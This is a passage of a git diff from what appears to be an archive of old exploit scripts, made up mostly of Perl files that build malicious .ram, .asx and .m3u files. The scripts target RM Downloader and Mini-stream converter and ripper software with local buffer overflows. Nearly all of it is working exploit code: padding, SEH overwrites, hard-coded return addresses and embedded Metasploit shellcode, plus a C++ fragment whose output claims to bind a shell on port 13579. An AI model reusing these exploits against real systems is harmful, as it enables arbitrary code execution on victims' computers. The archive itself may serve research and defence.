+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
+"\x4e\x46\x43\x36\x42\x50\x5a";
+my $junk = "\x41" x 260;
+my $next_seh="\xeb\x06\x90\x90";
+my $seh  = "\x44\x25\xD1\x72"; #
+my $nops = "\x90" x 50;
+my $nopsled = "\x90" x 20;
+open(my $playlist, "> seh_exploit.m3u");
+print $playlist
+                    $junk.$next_seh.$seh.$nops.$shellcode.$nopsled.
+                    "\r\n";
+close $playlist;
+
+# milw0rm.com [2009-05-07]
diff --git a/platforms/windows/local/8628.pl b/platforms/windows/local/8628.pl
index 2f2c55641..779bdb7a1 100755
--- a/platforms/windows/local/8628.pl
+++ b/platforms/windows/local/8628.pl
@@ -1,50 +1,50 @@
-#!/usr/bin/perl
-=gnk
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\...From Iran
-
-==============================================================================
-	RM Downloader 3.0.0.9 (.RAM) Local Buffer Overflow Exploit
-==============================================================================
-	[»] Script:.............[ RM Downloader 3.0.0.9 ].......................
-	[»] Website:............[ http://mini-stream.net/ ].....................
-	[»] Today:..............[ 07052009 ]....................................
-	[»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
-==============================================================================
-
-	[x] tested on "Windows XP SP2"... [:-)
-	
-=cut
-
-my $MSD = "rtsp://"."G" x 26117;
-my $SMN = "\x90" x 16;
-my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".
-             "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".
-             "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".
-             "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".
-             "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
-             "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
-             "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
-             "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
-             "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
-             "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";
-
-  open(RAM,'>>gnk.ram');
-  print RAM $MSD.$RA.$SMN.$Shcode;
-  close(RAM);
-
-# milw0rm.com [2009-05-07]
+#!/usr/bin/perl
+=gnk
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\...From Iran
+
+==============================================================================
+	RM Downloader 3.0.0.9 (.RAM) Local Buffer Overflow Exploit
+==============================================================================
+	[»] Script:.............[ RM Downloader 3.0.0.9 ].......................
+	[»] Website:............[ http://mini-stream.net/ ].....................
+	[»] Today:..............[ 07052009 ]....................................
+	[»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
+==============================================================================
+
+	[x] tested on "Windows XP SP2"... [:-)
+	
+=cut
+
+my $MSD = "rtsp://"."G" x 26117;
+my $SMN = "\x90" x 16;
+my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".
+             "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".
+             "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".
+             "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".
+             "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
+             "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
+             "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
+             "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
+             "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
+             "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";
+
+  open(RAM,'>>gnk.ram');
+  print RAM $MSD.$RA.$SMN.$Shcode;
+  close(RAM);
+
+# milw0rm.com [2009-05-07]
diff --git a/platforms/windows/local/8629.pl b/platforms/windows/local/8629.pl
index b1e956006..a04d25850 100755
--- a/platforms/windows/local/8629.pl
+++ b/platforms/windows/local/8629.pl
@@ -1,50 +1,50 @@
-#!/usr/bin/perl
-=gnk
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\...From Iran
-
-==============================================================================
-	Mini-stream ASX to MP3 Converter 3.0.0.7 (.RAM) Local Buffer Overflow Exploit
-==============================================================================
-	[»] Script:.............[ Mini-stream ASX to MP3 Converter 3.0.0.7 ]....
-	[»] Website:............[ http://mini-stream.net/ ].....................
-	[»] Today:..............[ 07052009 ]....................................
-	[»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
-==============================================================================
-
-	[x] tested on "Windows XP SP2"... [:-)
-	
-=cut
-
-my $MSD = "rtsp://"."G" x 26117;
-my $SMN = "\x90" x 16;
-my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".
-             "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".
-             "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".
-             "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".
-             "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
-             "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
-             "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
-             "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
-             "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
-             "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";
-
-  open(RAM,'>>gnk.ram');
-  print RAM $MSD.$RA.$SMN.$Shcode;
-  close(RAM);
-
-# milw0rm.com [2009-05-07]
+#!/usr/bin/perl
+=gnk
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\...From Iran
+
+==============================================================================
+	Mini-stream ASX to MP3 Converter 3.0.0.7 (.RAM) Local Buffer Overflow Exploit
+==============================================================================
+	[»] Script:.............[ Mini-stream ASX to MP3 Converter 3.0.0.7 ]....
+	[»] Website:............[ http://mini-stream.net/ ].....................
+	[»] Today:..............[ 07052009 ]....................................
+	[»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
+==============================================================================
+
+	[x] tested on "Windows XP SP2"... [:-)
+	
+=cut
+
+my $MSD = "rtsp://"."G" x 26117;
+my $SMN = "\x90" x 16;
+my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".
+             "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".
+             "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".
+             "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".
+             "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
+             "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
+             "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
+             "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
+             "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
+             "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";
+
+  open(RAM,'>>gnk.ram');
+  print RAM $MSD.$RA.$SMN.$Shcode;
+  close(RAM);
+
+# milw0rm.com [2009-05-07]
diff --git a/platforms/windows/local/863.cpp b/platforms/windows/local/863.cpp
index 4972954b0..ac4bf82ec 100755
--- a/platforms/windows/local/863.cpp
+++ b/platforms/windows/local/863.cpp
@@ -93,6 +93,6 @@ int main(int argc,char *argv[])
 	}
 	printf("File written.Binds a shell on port 13579.\nOpen with realplayer to exploit.\n");
 	return 0;
-}
-
-// milw0rm.com [2005-03-07]
+}
+
+// milw0rm.com [2005-03-07]
diff --git a/platforms/windows/local/8630.pl b/platforms/windows/local/8630.pl
index 594378a45..4673dc1c6 100755
--- a/platforms/windows/local/8630.pl
+++ b/platforms/windows/local/8630.pl
@@ -1,63 +1,63 @@
-#!/usr/bin/perl
-=gnk
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\...From Iran
-
-==============================================================================
-	Mini-stream ASX to MP3 Converter 3.0.0.7 .ASX File (HREF) Local Buffer Overflow Exploit
-==============================================================================
-	[»] Script:.............[ Mini-stream ASX to MP3 Converter 3.0.0.7 ]....
-	[»] Website:............[ http://mini-stream.net/ ].....................
-	[»] Today:..............[ 07052009 ]....................................
-	[»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
-==============================================================================
-
-	[x] tested on Windows XP SP2...
-	[x] if you are not able to make this shit work, just put it in the Base/Root
-	    of a Drive/Partition, like "C:\gnk.asx"...
-
-=cut
-
-my $MSD = "G" x 26110;
-my $SMN = "\x90" x 16;
-my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".
-             "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".
-             "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".
-             "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".
-             "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
-             "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
-             "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
-             "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
-             "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
-             "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";
-
-my $ASX = 
-"<asx version=\"3.0\">
-  <title>Title is not important.
-  
-    Example...
-    
-    G4N0K
-    ©2009 G4N0K
-  
-";
-
-  open(ASX,'>>gnk.asx');
-  print ASX $ASX;
-  close(ASX);
-
-# milw0rm.com [2009-05-07]
+#!/usr/bin/perl
+=gnk
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\...From Iran
+
+==============================================================================
+	Mini-stream ASX to MP3 Converter 3.0.0.7 .ASX File (HREF) Local Buffer Overflow Exploit
+==============================================================================
+	[»] Script:.............[ Mini-stream ASX to MP3 Converter 3.0.0.7 ]....
+	[»] Website:............[ http://mini-stream.net/ ].....................
+	[»] Today:..............[ 07052009 ]....................................
+	[»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
+==============================================================================
+
+	[x] tested on Windows XP SP2...
+	[x] if you are not able to make this shit work, just put it in the Base/Root
+	    of a Drive/Partition, like "C:\gnk.asx"...
+
+=cut
+
+my $MSD = "G" x 26110;
+my $SMN = "\x90" x 16;
+my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".
+             "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".
+             "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".
+             "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".
+             "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
+             "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
+             "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
+             "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
+             "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
+             "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";
+
+my $ASX = 
+"
+  Title is not important.
+  
+    Example...
+    
+    G4N0K
+    ©2009 G4N0K
+  
+";
+
+  open(ASX,'>>gnk.asx');
+  print ASX $ASX;
+  close(ASX);
+
+# milw0rm.com [2009-05-07]
diff --git a/platforms/windows/local/8631.pl b/platforms/windows/local/8631.pl
index f418b5a17..680c5680e 100755
--- a/platforms/windows/local/8631.pl
+++ b/platforms/windows/local/8631.pl
@@ -1,50 +1,50 @@
-#!/usr/bin/perl
-=gnk
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\...From Iran
-
-==============================================================================
-	Mini-stream Ripper 3.0.1.1 (.RAM) Local Buffer Overflow Exploit
-==============================================================================
-	[»] Script:.............[ Mini-stream Ripper 3.0.1.1 ]..................
-	[»] Website:............[ http://mini-stream.net/ ].....................
-	[»] Today:..............[ 07052009 ]....................................
-	[»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
-==============================================================================
-
-	[x] tested on "Windows XP SP2"... [:-)
-	
-=cut
-
-my $MSD = "rtsp://"."G" x 26117;
-my $SMN = "\x90" x 16;
-my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".
-             "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".
-             "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".
-             "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".
-             "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
-             "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
-             "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
-             "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
-             "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
-             "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";
-
-  open(RAM,'>>gnk.ram');
-  print RAM $MSD.$RA.$SMN.$Shcode;
-  close(RAM);
-
-# milw0rm.com [2009-05-07]
+#!/usr/bin/perl
+=gnk
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\...From Iran
+
+==============================================================================
+	Mini-stream Ripper 3.0.1.1 (.RAM) Local Buffer Overflow Exploit
+==============================================================================
+	[»] Script:.............[ Mini-stream Ripper 3.0.1.1 ]..................
+	[»] Website:............[ http://mini-stream.net/ ].....................
+	[»] Today:..............[ 07052009 ]....................................
+	[»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
+==============================================================================
+
+	[x] tested on "Windows XP SP2"... [:-)
+	
+=cut
+
+my $MSD = "rtsp://"."G" x 26117;
+my $SMN = "\x90" x 16;
+my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".
+             "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".
+             "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".
+             "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".
+             "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
+             "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
+             "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
+             "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
+             "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
+             "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";
+
+  open(RAM,'>>gnk.ram');
+  print RAM $MSD.$RA.$SMN.$Shcode;
+  close(RAM);
+
+# milw0rm.com [2009-05-07]
diff --git a/platforms/windows/local/8632.pl b/platforms/windows/local/8632.pl
index c60ea5573..c71611065 100755
--- a/platforms/windows/local/8632.pl
+++ b/platforms/windows/local/8632.pl
@@ -1,63 +1,63 @@
-#!/usr/bin/perl
-=gnk
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\...From Iran
-
-==============================================================================
-	Mini-stream Ripper 3.0.1.1 .ASX File (HREF) Local Buffer Overflow Exploit
-==============================================================================
-	[»] Script:.............[ Mini-stream Ripper 3.0.1.1 ]..................
-	[»] Website:............[ http://mini-stream.net/ ].....................
-	[»] Today:..............[ 07052009 ]....................................
-	[»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
-==============================================================================
-
-	[x] tested on Windows XP SP2...
-	[x] if you are not able to make this shit work, just put it in the Base/Root
-	    of a Drive/Partition, like "C:\gnk.asx"...
-
-=cut
-
-my $MSD = "G" x 26110;
-my $SMN = "\x90" x 16;
-my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".
-             "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".
-             "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".
-             "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".
-             "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
-             "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
-             "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
-             "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
-             "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
-             "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";
-
-my $ASX = 
-"
-  Title is not important.
-  
-    Example...
-    
-    G4N0K
-    ©2009 G4N0K
-  
-";
-
-  open(ASX,'>>gnk.asx');
-  print ASX $ASX;
-  close(ASX);
-
-# milw0rm.com [2009-05-07]
+#!/usr/bin/perl
+=gnk
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\...From Iran
+
+==============================================================================
+	Mini-stream Ripper 3.0.1.1 .ASX File (HREF) Local Buffer Overflow Exploit
+==============================================================================
